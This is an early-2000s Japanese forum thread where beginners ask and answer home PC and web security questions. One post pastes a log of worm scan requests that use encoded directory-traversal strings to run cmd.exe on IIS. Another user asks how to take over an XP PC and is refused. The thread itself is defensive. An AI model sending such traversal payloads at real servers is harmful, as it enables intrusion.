Squidの串は"FORWARDED_FOR"を必ず元IP(生)を 吐き出しちゃうの?
>>183 そうでもない設定のsquidが広いインターネットの中に何台かあるかも知れない。
>>184 ありがとうございます。
探してみます!って!探せないようですね(w
186 :
名無しさん@お腹いっぱい。 :02/06/28 00:41
Apache, OpenSSH, libc と立て続けに大物のセキュリティホールが 見つかってますが、なぜこの板ではスレが立たないんでしょう?
>>186 それらが何かわからなかったり用のないやつらしかいないから
188 :
名無しさん@お腹いっぱい。 :02/06/28 00:59
スレが立たない、とな? 自分で立てりゃいいだろ?
>186 ここ、win使い限定ですから。 まあ、UNIX板ではsshスレ、apacheスレで語られてるし、linux板では 各ディストリスレで語ってるからなぁ。 まあ、チェックするべきサイトわかってるのと、ユーザー数か。 もうちょっとUNIX・Linuxスレあっても良いとは思うけどね。
>>186 そういう話題に関係する人は他の板でやってる
191 :
名無しさん@お腹いっぱい。 :02/06/28 01:35
あの・・・ くだらない質問で申し訳ないです。 6718のポートにお客さんが来たのですが6718のポートって 何に使われてるのでしょうか? 調べても分かりませんでした
193 :
名無しさん@お腹いっぱい。 :02/06/28 01:47
>192さん わざわざありがとう。 じゃ、変なソフトでも入れちゃたのかな・・・ (でも、どこから出たんだろう) 因みにUDPです
不明なポートへのポートスキャンは大抵トロイだろ。 そんなに珍しいか?
195 :
名無しさん@お腹いっぱい。 :02/06/28 04:50
自分はルーターを介してのネット接続なのですが、ルーターを使った 接続の場合セキュリティソフトは必要無いのでしょうか?
196 :
名無しさん@お腹いっぱい。 :02/06/28 05:02
>>195 ルータはアウトバウンド接続の監視ができないので
スパイウェアがPC内に入ってしまったとき発見できない。
FWソフトも入れておいたほうがいい。
197 :
名無しさん@お腹いっぱい。 :02/06/28 05:12
>>196 入れておいたほうが良いですか、有難うございます!!
198 :
名無しさん@お腹いっぱい。 :02/06/28 05:27
携帯サイトをPCで見るにはどうしたらいいのですか? PCからのアクセスはできないようになっているみたいです。 多分PCからのipは弾かれるようになっていると思うのですが どうすればいいのでしょう?
199 :
名無しさん@お腹いっぱい。 :02/06/28 06:10
200 :
名無しさん@お腹いっぱい。 :02/06/28 08:24
書く時間が悪かったのか、内容が悪かったのか・・・
202 :
名無しさん@お腹いっぱい。 :02/06/28 09:22
204 :
名無しさん@お腹いっぱい。 :02/06/28 10:07
>>203 ブラクラチェッカーで次に進めないのはNIS入れてるから。
拡張オプションでcoara.or.jpのリファラーを許可する。
205 :
名無しさん@お腹いっぱい。 :02/06/28 11:18
携帯電話のメールって外部からアクセスして 中身を見る事ってできるんですか? なんか最近そんな気がするんですけど。 削除したメールが復活してたりするし。
208 :
名無しさん@お腹いっぱい。 :02/06/28 11:31
>>206 そうなんですか?
例えばセンターのメールサーバにアクセスするとか
できないんですか?
>>208 おめーさんのメールを覗き見するメリットはどこにあんのよ?
あんた政府の要人か?
>>209 勝手に決め付けるのもいかんのじゃないかな。
ストーカーに悩まされているのかもしれないし。
ちなみに俺はヘタレなんで
>>208 には答えられません。
>>208 アクセスは出来る、メールを読むことは出来ない
212 :
名無しさん@お腹いっぱい。 :02/06/28 11:48
IEで、お気に入りに追加すると、 なにかを送信してるんだけど。 これは普通なの?
>212 お気に入り用のアイコンがないか調べに行ってるとかじゃないの?
215 :
名無しさん@お腹いっぱい。 :02/06/28 12:25
>>209 浮気相手とのメールの内容を彼女が知ってたので
どこからアクセスしてメール見てるんじゃないかと。
>215 一番簡単な方法を教えよう。 君が知らない間に携帯を直接覗く。 ちなみに違法だ。
ちなみに窃盗罪。
しっかし不思議でしょうがないんだが 浮気相手とのメールばれた→彼女が鯖ハッキング?? この思考回路はどっからくるのか もっと、現実的なこと考えない? 彼女とその浮気相手が同一の友達もってて・・・とか 直接接触して・・・とか そう簡単に人のメール盗み読みできるようなセキュリティ だったらとっくに大問題だと思うんだが
現代病にかかってる人が多いようだね 意外と単純なことに気が付かない罠
近すぎて気付かない恋心
理解不能なことは全てハカーのせいという情報操作の賜物ですね。 > そう簡単に人のメール盗み読みできるようなセキュリティ > だったらとっくに大問題だと思うんだが でもセキュリティホールなんて、なぜ今まで気づかなかったんだというミスが多いよ。
>>222 否、ウィルスもモテまくり。
困ったらウィルス。困ったらハッカー。困ったらバグ。
課長の保存し忘れたWordのファイルは
ハッカーの手によって葬り去られる。
納期が迫ったプログラムのソースがウィルスによって削除される。
お気に入りに追加した瞬間、 ゾーンアラームが通信してる状態になるんだけど。
フォントキャッシュ破損は99%ウィルスのせいにされるな。 ウィルスかわいそうだ
どこに質問していいかわからなくてこちらで伺うのですがアクセスログを眺めていると PockyというUAがあります。どうもあるフォルダ以下をごっそり持っていくようなのですが 何らかの情報をお持ちの方いらっしゃいますか? はっきり実害があるとはいえないですが気持ち悪いので気になります。
pockyってUAを持つダウンロード支援ツールがあるか 自分でUAをpockyにしてるかのどっちか。 関係ないが、UAを珍しいのにしてんのって厨房くらいだろ (友達のBBSでUAが表示されて、それで遊んでるとかならあれだが) 珍しいブラウザつかってるからIEとかに偽装するってならわかるんだが。。。
>>229 マヌケなBBSだとUAでタグ仕込める。
エー・・・ そんなBBSあんのかよ・・・しんじらんね
>>230 .231
以前、2ちゃんねるでも
UA実験時とか、メール欄にタグとか・・・以下略
書き込みは入力チェックしてもUAとかリファはそのまんまログに記録ってところが多いからなぁ。 一応これくらいはしとかないと。 < → < > → >
< → < > → > ね・・
>>226 無駄な糞ソフトをバカスカ入れるのが悪いのにな(藁
236 :
名無しさん@お腹いっぱい。 :02/06/29 00:46
「218.44.39.220」という IPから毎日 PingAttackされます どうしたら、いいですか? 一応、プロバイダはわかったのですが どうかよろしくお願いします
>>237 ウイルスバスターのログがありますが
それじゃダメなんですか?
>>239 レス有難うございます
一応メールはしたのですが、止めてもらえるのでしょうか?
やられたら、やり返すみたいな物ないんですかね
なんか、悔しいです。
241 :
名無しさん@お腹いっぱい。 :02/06/29 02:03
>240 なんで悔しいのかワカラソ ピンポイントで狙われてるわけでもなし。 なんか心当たりでも?
>>241 心当たりは、無いんです
悔しい理由は、うーん どう表現したらいいんだろうなぁ
ピンポンダッシュされた、家の人の気持ちかな
変な例えスマソ
>>242 っつーかやり返すという幼稚なことはやめれ
>>243 冷静になってみると、おっしゃるとうりですね。
ご指摘、ありがとうございました。
ネットにつないでりゃ、PingAttackなんかしょっちゅうあるぞ。 気にしてたらキリがない。 バスターがブロックしてくれてるんだから、実害はなんもないだろ。
PingAttackだと騒ぐバカは、大概が割れ厨
247 :
名無しさん@お腹いっぱい。 :02/06/29 04:13
最近 ○○へ行け って言うと (そこをよく調べろ よく読めという意味なのに) そこで 新スレ立てたり 質問するバカが増えたな
248 :
名無しさん@お腹いっぱい。 :02/06/29 05:26
proxomitronを起動すると、何故か知らない外人がソレを踏み台に .jpなircサーバに繋ぎやがるんですけど、仕様ですか? (TT っていうか何でircなんかに繋がるんだろう‥‥
設定→アクセス→この PC からの〜にチェックは言ってなかったらアホ決定。 そうじゃなきゃ(踏み台にされるとは思えんが)サービスポート変えろ。
あと外部からのアクセス deny すればいいじゃん
>>249 LAN内で使えるようにローカルアドレスを範囲指定してたんですけど
旧バージョンはその辺にバグがあったらしいですね(今調べました)
パケットキャプチャ仕掛けてしばらく放置しとくと、
かなり多人数が使いに来てるんですが、そういうモノなんですか‥‥
>>251 だってあんさん、完全に元IP隠せる&串扱いされない
最強の串でっせ
串チェックのポートスキャンとかしょっちゅうくるでしょう
外部に開けてたらすぐ使われるよ
そういう事は絶対にお勧めしないが、最低でもサービスポート
変える位はしないとダメすぎ
>>251 CyberSyndromeあたりの串リストに載ってたりして。
リモートホストが晒されると、どのようなリスクが想定されますか?
256 :
名無しさん@お腹いっぱい。 :02/06/29 09:25
\Eドライブに,ijl11.dllとMKCD2.dllというファイルがありました. プロパティを見ると同じ日に作成されたみたいです. いったいこれは何のでしょう?このPCに何かされているのでしょうか? アプリケーション:不明なアプリケーション となっていました.よろしくお願いします.
これって何かされてますか? 43.225.166.60 - - [29/Jun/2002:05:53:29 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 43.225.166.60 - - [29/Jun/2002:05:53:32 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 43.225.166.60 - - [29/Jun/2002:05:53:33 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
わかんねーやつは鯖立てんな
赤虫とか煮無駄とかだろ
262 :
名無しさん@お腹いっぱい。 :02/06/29 20:40
マカフィーウイルススキャンをインストール中に このページでのスクリプトでエラーが発生しました オブジェクトでサポートされていないプロパティまたはメソッドです と表示され、以降インストール作業が進みません。 今まで使っていたプレインストール版はアンインストールしたのですが どうしたらよいでしょうか?
ごめん。板違い。。。
266 :
名無しさん@お腹いっぱい。 :02/06/30 05:28
これからノートンインターネットセキュリティか、 BlackICEのどちらを買おうか迷ってます アドバイス等をお願いします(理由もできれば)
黒氷とNIS比べてるヤシに蹴男はないだろ・・・ 穴だらけになるぞ ぞねは勧めんが、SygateとかOutpost使ってみればいいだろう #なんで初心者に限って有料のソフト使おうとするのか
269 :
名無しさん@お腹いっぱい。 :02/06/30 06:05
レスありがとうございます 初心者は黙ってZONEをつかいます
271 :
名無しさん@お腹いっぱい。 :02/06/30 06:13
質問です。 他者のメール等を盗み見るというネット犯罪が流行っているようですが。 その他者がアクセスしたページや、例えば2ちゃん等の掲示板に 書き込みした内容も見えてしまうハッキングというのはあるのでしょうか? 最近、とある人物を疑ってまして。 もしかしたら自分のPCの情報が 盗まれているのではないかという不安にかられています。 本当に初心者の質問ですみません。 どなたか教えてください。
>>269 ぞね使ってもいいがセキュ板でゴミパケ報告だけは絶対すんなよ
>>271 >他者のメール等を盗み見るというネット犯罪が流行っているようですが。
別に流行ってないよ
どっかのスレにもあったが、そういうハッキングまがいの事された
なんて考える前に、他にもっと現実的な思い当たる点は無いのか?
君がどんだけ偉い人かは知らんが、
不可能では無いが、普通リスクとリターンが釣り合わない行為だとだけ言っておこう。
#まあ、トロイ踏んでたりすれば丸分かりなんだが(わら
裏口しかけても、2chの書き込み見たってしょーがない・・・
聞き逃げばっかだね
275 :
名無しさん@お腹いっぱい。 :02/06/30 13:26
NISを有効にしておくとOutlookでメールが 送受信できなくなってしまいました。 無効にすればOKなのですが。 Outlookのインターネットアクセス設定はすべて許可にしてあります。 直し方が分かる方教えてください。
>>275 自動切断を切るか、メールスキャン機能自体を無効にするか
のどちらかしかないと、メーカーサイトに書いてある
277 :
名無しさん@お腹いっぱい。 :02/06/30 18:10
プロキシのBlackJumboDogをダウンロードしたのですが、プロキシの アドレス、ポートとは何なのでしょうか?
>>276 TCP/IPの入門書を1冊買ってきましょう。
279 :
名無しさん@お腹いっぱい。 :02/06/30 19:17
>>276 お答えありがとうございました。
教えていただいたサイトを確認し、
2つとも試してみましたがダメでした。
他に何かありましたら、アドバイスお願いします。
276じゃなくて277だった。
282 :
名無しさん@お腹いっぱい。 :02/06/30 20:33
のーとんAntiVirusは再インスコすればタダなのですね?
285 :
名無しさん@お腹いっぱい。 :02/06/30 21:39
まうすが かってに へやじゅう はしりだすのですが とめる ほうほうは ないでしょうか?
いいってよしっっっっっ!!!!
とりあえず ぺっとしょっぷで ねこを かってきましょう
288 :
名無しさん@お腹いっぱい。 :02/06/30 21:43
プロキシ設定オンにしたら画面が表示されないのですが・・。
289 :
名無しさん@お腹いっぱい。 :02/06/30 22:38
カーンってハカーなの?
>>288 使ってないのにチェックしても意味ありません。
>>290 なんだか分からないので使うのを辞めます。ありがとうございました。
>289 カーンは相場師じゃ
294 :
名無しさん@お腹いっぱい。 :02/06/30 23:58
295 :
名無しさん@お腹いっぱい。 :02/07/01 00:02
すくりーん せいばーを みると きもちがわるくなってきて はきけがするのですが、だいじょうぶでしょうか?
297 :
名無しさん@お腹いっぱい。 :02/07/01 06:19
ウイルスバスター、マカフィー、ノートン どれがベスト??
299 :
教えて下さい :02/07/01 17:42
最近ファイアウォールにtracerouteで引っかかるIPがあるのですが、放っておいても大丈夫でしょうか? IPドメインサーチの存在を知ったので、自分なりに調べてみようとしましたが、何の事やら全然理解できません。 どなたか御教示お願いします。 相手のIPは127.1.1.1で、こちらの環境はMe,IE5.5sp2,バスター2002を常駐させています。 ちなみに、履歴やcookieを消しても接触があり、Ad-awareで定期的にチェックもかけています。
300 :
名無しさん@お腹いっぱい。 :02/07/01 17:47
IPがばれると実際にどうヤバインですか?
昨夜から今日にかけ、某社無料サーバーにおいていたHPのトップページ が、何者かによってアダルト画像に書き換えられてました。 一応、その某社には連絡のメールを入れておいたのですが・・・ どうしたらいいんですかね?
>>301 パスワード変える。なるべくなが〜いものに。
>>302 さん
やっぱり進入経路って、そういう経路になるんですか・・・。
HPビルダーとFFFTPを使用しているのですが、この辺から
漏れたということはないのでしょうか?
>>299 ネタ?それにしてはツマランけど。ネタじゃないなら貴方は
「鏡に写った自分の姿を見て敵だと思いフーッと唸っている猫」と同じです。
>>303 パスワードを一文字ずつ変えながら全部の組み合わせを総当り法で試して
パスワード破りするソフトでも使ってるんじゃないの、相手は?
それだと、5〜6桁のパスワードならあっという間でしょう、よく知らないけど。
あなたのPCに侵入して盗んだとか、途中の経路で盗み見たとか、
そういう可能性は低いのではないかと。
306 :
教えて下さい :02/07/01 18:21
>304殿 判りやすい回答ありがとうございます。 バスター入れた当初は出なかったので、そうとは思いもしませんでした。 それにしてもネタと思われる程、程度の低い質問だったとは… もう少し勉強してから出直してきます。
>>306 ループバックアドレス→自分のパソ自身
127.0.0.0〜127.255.255.255
web上でマイPCをポートスキャンしてくれるページってどこだっけ? つるっ禿げガイシュツですんませんが
>309 あんがと!
312 :
ヘタレなのに :02/07/01 18:44
海外掲示板に書き込んだんですが機嫌損ねたらハッキングとかされますか? チョソン怖いんですけど。やべーもう駄目か?
>>312 一旦接続切るとIPアドレス変わる環境なら、そんなに心配ないような気が。
314 :
名無しさん@お腹いっぱい。 :02/07/01 18:50
>>306 勉強する気があるのならTCP/IP関連書籍を読むのも良いが、バスターのPFWは止めて
この板にスレのあるフリーのPFWを使うのが実践的で良いと思う。
とりあえずバスターのPFWは止めれ、あれはPFWといえない糞だから。バスターはAVの機能のみ
使用すればよろし。
お勧めはOutpost、Sygate、Kerioの3種だが
難易度・・・・・・Outpost<Sygate<Kerio (Kerioが初心者には一番難しい)
勉強になる度・・・・・・Outpost<Sygate≦Kerio
てな感じかな。但しバスターのPFW機能をはずして他のPFWインストールするのは
ちょっと手順が必要なので関連スレ読んで調べてくれ。
315 :
ヘタレなのに :02/07/01 18:53
>>313 ありがとうございます。
F5攻撃で有名な奴らが敵になったら嫌だなあ。
>>305 さん
たびたびありがとう御座います。
あんまり書くとどこの無料サーバかばれそうですが、
そこは8桁でした。
いやーしかし、有名サイトならともかく、まさか自分のHPで
こんなことになるなんて、おもってもみませんでした。
無料HPつかってるようなサイトなのに・・・。
>>311 サンクス!
でも、確か日本語のサイトが有ったと思うんだけど
日本語の方は分かりませんか?
質問は
>>308 でっす
318 :
教えて下さい :02/07/01 19:07
>cheshire-cat殿 ありがとうございます。2002スレの書き込みも参考にさせていただいています。 >314殿 バスターのPFWは糞ですか(w 当座の目標が出来ました。頑張ってみます。
>319 ご丁寧に有難う御座います。 これから過去ログをブルートフォースアタックしてみまっす
321 :
名無しさん@お腹いっぱい。 :02/07/01 19:23
>321 おぉ!! おりがとデス! 感謝、感謝♪
324 :
名無しさん@お腹いっぱい。 :02/07/01 23:25
「GET要求」の正確な定義が知りたいのです。 ページに含まれる画像ファイルなどのリクエストも、GET要求数に含まれますか?
RFC嫁
コピーコントロールCDのロックはどうやって外せばいいんですか? 通勤用にCD−Rでベスト版を作りたいんですが・・・。 どなたかご存知でしたら教えてください。
330 :
名無しさん@お腹いっぱい。 :02/07/02 04:32
331 :
名無しさん@お腹いっぱい。 :02/07/02 04:42
すいません言葉が足りませんでした。 上記のアドレスに繋ぐと、 「以下の情報を記録させていただきました」 と表示されて、リモートアドレス?などの情報が表示されました。
>>331 さん
どのようにやばいのでしょうか?Javascriptはつかってるんですが。
REMOTE_HOST が(none) である以外は表示されていました。
335 :
名無しさん@お腹いっぱい。 :02/07/02 05:05
>>330 そういった情報をホームページを見るときに相手に渡していますよ。
と言うものです。
>>335 ご返答ありがとうございます。
これで勝手にクレジットカードから引き出されたりとか
そういうものではないのですか?
337 :
名無しさん@お腹いっぱい。 :02/07/02 05:20
やっと安心して眠れます。ありがとうございました。
339 :
名無しさん@お腹いっぱい。 :02/07/02 05:25
>>336 そもそもPCの中にクレジットカード情報なんて置いておかなければ、
持っていかれることもありません。:p
そういったニュースをたまに見かけるので心配してしまいました。
341 :
名無しさん@お腹いっぱい。 :02/07/02 10:51
ウェブ上にアップロードしたcgiが何者かに書き替えられてしまいます。 パーミッション等もマメに変えてみたりはするのですがダメみたいです。 何かいい対処法はないでしょうか?
>>341 サーバー管理者に相談してください。
恐らく、貴方の勘違いです。
343 :
名無しさん@お腹いっぱい。 :02/07/02 11:10
>>342 いえ、勘違いではありません。
掲示板に書き込まれたみんなのログも消えるので
不審に思いffftp側にアップされているlogファイルを見ると
0になってます。
ダウンロードしているlogについては再アップで復活するのですが・・・
>343 >344と同じ意見。 例えば漏れの使ってるレンタルサーバーだと、容量がオーバーすると そのファイルが消される事もある。 「消える」と「書き換えられる」の違いはわかるよな? 「書き換えられた」なら、何がどう変えられたかによるんじゃないか?
>>343 どうせ、不正なCGIを使用してるんだろ。
>>343 ヘボCGIは排他制御してないから、同時書き込みでクリアされるという罠。
>>343 cgiが書き換えられてるのとlogが消えてるのじゃ意味が違うだろうよ。
いずれにしても「書き換えられてる説」は勘違いに1票。
logを書き換えてるのはcgiでせう。
351 :
名無しさん@お腹いっぱい。 :02/07/02 14:26
ソースネクストのインターネットセキュリテイを買いました。 説明には「ソフトウェア1部につきパソコン1台にインストールできる」 と書かれているのですが、 私はあと2,3ヶ月でパソコンを買い換える予定なんです。 そのときに、新しいパソコンに先日買ったこのインターネットセキュリティを インストールすることができるのでしょうか? また買いなおさなければならないのでしょうか?
>>351 買い換えて、そのパソコンだけで使うのであれば問題なし。
古いのも一緒にインストールしようとするのはダメ。
353 :
名無しかな・・ :02/07/02 15:59
354 :
名無しさん@お腹いっぱい。 :02/07/02 16:10
初めまして。 僕はHPを持っているんだけど、掲示板で書いた人のホストをしています。 しかし、一人だけ?4桁の番号をコロコロと変えて荒らしている人がいるんですが アクセス拒否の対策はないんでしょうか? 下に4桁の番号の一部を紹介します。 133.49.200.203 212.214.3.173
>>352 どうも丁寧にありがとうございます!!
早速インストールします!!
>>355 >4桁の番号
それのどこが4桁やねん? 算数からやり直した方が・・・(以下省略)
358 :
名無しさん@お腹いっぱい。 :02/07/02 17:55
>>357 つっこんでないできちんと答えてやれよ。お前答えられないんだろ。
>>355 IPアドレスについては、ネットにつないだときにある程度の範囲でランダムになる。
だからIPアドレスでの制限は厳しい。
上段のアドレスは佐賀の大学らしい。頻繁にあらされるなら、管理者に、アクセスしている掲示板、
時刻を連絡して相手に注意してもらうことも手段。ただし、大学のセキュリティーが甘くてほかのクラッカーに
利用されている可能性も捨てきれないので、いきなり大学の管理者に怒鳴り込むのはやめましょう。
もし、その大学の学生さんだったらうまくいけば、荒しを退学に追い込めます(w
それと下段のIPはよくわかりません。(ごめんなさい)
学外から、ほかのサーバーを経由しての書き込みかもしれませんね。
こうなるとちょっと防ぎようかないかも。
>>355 212.214.3.173は外部から使えるプロキシサーバ。設置場所はスウェーデン。
あらしは黙って削除して後は無視、そのうち飽きる。これが鉄則。
>IPアドレスについては、ネットにつないだときにある程度の範囲でランダムになる。 うーむ。したり顔で微妙な嘘を書くのがいちばん厄介かもナー。
嘘じゃなくて大真面目なのかも
windowsXP+IE6,アドミはパスなしのPCを 乗っ取りたいのですが、nbt経由では XPから空白のパスだと侵入できないので、 無理みたいでした。 IEのバグ(nimda系とactivX系)をついて、exeを実行させようとしましたが 無理みたいでした。 それで、UPnPを利用してみようと思うのですが、 UPnP関係のツールを教えてください。
>>362 「この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。」
オーストラリーアからBackOrificeによる攻撃を喰らったらしいです。 普通ですか?
dakara kougeki ja ne-ttuno...
>362,365 それが人に物事を聞く態度か? うせろ
367 :
名無しさん@お腹いっぱい。 :02/07/02 22:38
>>345 パーミッションは705です(サーバーの推薦)
パーミッション600の分についても0バイトになっている時があります。
>>348 ヘボかどうかまでは分かりませんね。
>>367 お前にはわからなくとも、わかる奴にはわかる。
>>367 ログ飛んだだけ。
そのCGIにどれくらいのアクセス数があるかわからんけど、
排他制御(ロック処理)してても飛ぶことはあるね。
ログのパーミッション705って書き込みできないじゃん。CGIのパーミッションの間違い?
ログが600でいいなら、CGIは700でOKでしょ。
>>370 正しい排他制御が行われていれば飛ぶことは無い。
>371 是非とも、ログの飛ぶ事のない正しい排他処理を教えてほしい。
>>371 いんや、排他制御以外でもプロセスが途中で死んじゃうと飛ぶよ。
変なとこ(open()でデータをフラッシュするまでの間とか)でブラウザの中止ボタン押されたり。
シグナルハンドラ無視するとか方法あるけど板違いだね・・。
>>371 cgiは700ですよ。
logが705です。
>>374 >logが705です。
これは問題だ。
>369 失敬
380 :
名無しさん@お腹いっぱい。 :02/07/03 00:13
ひとりでもF5こうげきできますか?
381 :
名無しさん@お腹いっぱい。 :02/07/03 00:18
恐れ入りますが初歩的質問ですいませんが。 友人のエンジニア(ハード)に、セキュリティについて ファイアウォールの話をした所、 「『踏み台』とかってプロキシの話でしょ。 例えば80番の受付嬢に話されてもサーバー機能なけりゃ どうしようもない。そう神経質になることもない。 窓ってOS自体がサーバーになってるのかな。よう知らんけど」 と言われたのですが、そういうことなのでしょうか。
>381 よう知らん人間の話を信じるな。
>>381 ブラウザの穴突かれて、サーバー機能仕込まれるという事もありうる。
>>382 ポートが空いてようが平気ってわけじゃないですよね。
>>381 いつの間にやら所属不明の見知らぬ受付嬢が、
そ知らぬ顔で取次ぎを行う場合もあるので、
注意が必要です。
386 :
名無しさん@お腹いっぱい。 :02/07/03 00:24
ADSL、ダイアルアップルータ環境でSygateを使用しているのですが MAC Spoofingでデフォルトゲートウェイを 名乗っているアドレス(192.168.0.11)からARPが飛んできます この場合、ルータがクラックされているのでしょうか?
387 :
名無しさん@お腹いっぱい。 :02/07/03 00:25
webブースターとかローカル串立ててる場合は?
そう神経質になることは無いのは同意だが、その人Netbios開いてても 神経質になること無いよとか言いそうだな
>>377 いずれにしてもCGIもサーバもわからなきゃ答えは出ない
メールに添付ファイルとしてコンピュータウィルス(W32.Klez.gen@mm)が、 送られてきました。まだ開いていないです。駆除していのですが、どうすれば いいですか?ただファイルを削除するだけではダメですか? 駆除ツールを使用しないとダメですか?誰か教えてください。
>>390 ウィルス検出&ウィルス名が判明してるってことは、
アンチウィルスが何らかのアクション(駆除・隔離)をしたと思われ
お答え有難うございました。 ではポート、NetBiosも閉じておくのが基本、しかし サーバー機能のない一般家庭のパソコンでは 踏み台にされることも稀だろう、ということでよろしいのですね。
httpd立ててない一般のパソコンつっても、ローカルプロクシの役割をする Webフィルタリングソフト(Proxomitronとか)は設定如何で踏み台にされるし netbios外に開いてたら、net useコマンドで厨房でもHD丸ごと共有されるし (そこまで酷いプロバもあんま無いと思うが)、そもそもパーソナルファイヤーウォール って、Application filteringが大きいんだし。トロイくらってたら(その時点で救い無いが) いくらでも踏み台にされるしね。PFWはそれを100%防げる。 クライアントだから安全って考えはわけわからんです。終わり
つか、PFWなんて保険だから。 漏れ人ひかねーから保険いーらねっつって子供引いて億単位で 請求きても遅いわけで。
396 :
名無しさん@お腹いっぱい。222 :02/07/03 02:28
空気を読めない人が来たぞ。
ザワ ザワ ザワ ザワ ザワ
逃げて逃げて〜!
400 :
名無しさん@お腹いっぱい。 :02/07/03 10:56
from:welcom<
[email protected] >
subject:A new game
<HTML><HEAD></HEAD><BODY>
<FONT>This is a very new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT></BODY></HTML>
PostPet>>>>>添付ファイル:no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
PostPet>>>>>添付ファイル:0no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
こんなメールがきました。どうすればいいですか?誰か助けてください。
400 名前:名無しさん@お腹いっぱい。 投稿日:02/07/03 10:56
from:welcom<
[email protected] >
subject:A new game
<HTML><HEAD></HEAD><BODY>
<FONT>This is a very new game<br>
This game is my first work.<br>
You're the first player.<br>
I expect you would like it.</FONT></BODY></HTML>
PostPet>>>>>添付ファイル:no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
PostPet>>>>>添付ファイル:0no_filename がありました。
PostPet>>>>>C:\PROGRAM FILES\SO-NET\POSTPET FOR WINDOWS VER. 2.0\添付書類フォルダに展開しました
こんなメールがきました。どうすればいいですか?誰か助けてください。
こんなマルチポストがきました。どうすればいいですか?誰か助けてください。
(゚Д゚)y─┛~~
>>400-
>>401 いくつマルチポストしてるんだか。
どんどん自分の首締めているぞ(答が貰えなくなる。)
405 :
なぜ・・・ :02/07/03 12:14
諸事情で3週間ほどメールチェックできず、つい今しがた確認したら 未読が約15000通・・・。 9割9分がどこぞの会社の自動返信。 嫌がらせでも、15000は見た事無いし・・・新手のなんかでしょうか? どうしようもないのでメールボックス削除したんですけど、何か流行 りのものとか情報がありましたら、よろしくです。 なにぶん、一ヶ月も離れてたので・・・。
>>405 メールボムだったら特に流行とかいうもんでなく、
ずっとある現象だと思うけど。
407 :
名無しさん@お腹いっぱい。 :02/07/03 12:29
すみません、質問なんですが、 ICQを使ってて、ハッキングとかされることがあるのでしょうか?
409 :
◆ya0o5BXA :02/07/03 12:38
今朝、名前欄に固定+fusianasanを入れてしまいました。どうしたらいいのですか?
別に何も
411 :
名無しさん@お腹いっぱい。 :02/07/03 12:41
>>409 ひろゆきにケツの穴提供すれば何とかなるかもしれません。
412 :
,,,本気で困った。 :02/07/03 12:57
プリインストールされていたマカフィーを削除したらメールが急に 受信できなくなりました。送信はできるんですが。。。 アカウント・パスワードがはねられます。 メーラーはアウトルックエクスプレス5、OSはWin98です。 マカフィーの亡霊の仕業ですか? しごとでメール使っているので、仕事になりません。泣。
>412 アウトルックをアンインストールして別のメーラを入れろ。 仕事で使うならなおの事。
414 :
名無しさん@お腹いっぱい。 :02/07/03 13:03
MXってなんですか?
>>413 OEけなすのは構わんが、まともなメーラも一緒に紹介しろ。
417 :
名無しさん@お腹いっぱい。 :02/07/03 13:06
418 :
名無しさん@お腹いっぱい。 :02/07/03 13:09
>>417 どうしてお勧めできないの?皆使っているみたいだけど
>>418 違法かつ危険、それを承知の上でどうぞ。皆使ってるわけではありません。
詳細はダウソ板へ。
>>419 MX自体は違法じゃない。
つかいかたが違法なだけ。
422 :
名無しさん@お腹いっぱい。 :02/07/03 13:25
MXが危険とはどんな点なのよ?
>400 ごめんなさいあせってて もうしません。マナーって ものをしりませんでした。
>>408 リンク先を拝読し、勉強になりました。
どうも、ありがとうございました。
426 :
名無しさん@お腹いっぱい。 :02/07/03 18:21
誰か教えて下さい。 2ちゃん以外つながらなくなったのはなぜか。
427 :
名無しさん@お腹いっぱい。 :02/07/03 18:27
>>394 さんが言うように、Proxomitronのようなソフトが踏み台にされるとは
